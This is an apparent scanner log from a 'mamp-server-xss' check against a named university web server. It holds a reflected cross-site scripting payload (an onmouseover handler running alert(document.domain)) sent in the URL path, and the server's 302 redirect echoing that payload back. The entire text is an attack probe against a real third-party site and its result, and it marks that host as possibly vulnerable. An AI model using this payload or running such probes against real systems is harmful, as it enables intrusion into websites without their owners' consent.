[mamp-server-xss] Dumped HTTP request for http://web.mup.unimelb.edu.au/index.php/test"+onmouseover="alert(document.domain);"+style="font-size:100000px;background-color:white";


GET /index.php/test%22%20onmouseover=%22alert%28document.domain%29;%22%20style=%22font-size:100000px;background-color:white%22; HTTP/1.1
Host: web.mup.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[mamp-server-xss] Dumped HTTP response http://web.mup.unimelb.edu.au/index.php/test"+onmouseover="alert(document.domain);"+style="font-size:100000px;background-color:white";

HTTP/1.1 302 Found
Connection: close
Content-Length: 420
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 06 Aug 2025 15:18:46 GMT
Location: https://web.mup.unimelb.edu.au/index.php/test%22%20onmouseover=%22alert(document.domain);%22%20style=%22font-size:100000px;background-color:white%22;
Server: Apache/2.4.7 (Ubuntu)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://web.mup.unimelb.edu.au/index.php/test%22%20onmouseover=%22alert(document.domain);%22%20style=%22font-size:100000px;background-color:white%22;">here</a>.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at web.mup.unimelb.edu.au Port 80</address>
</body></html>

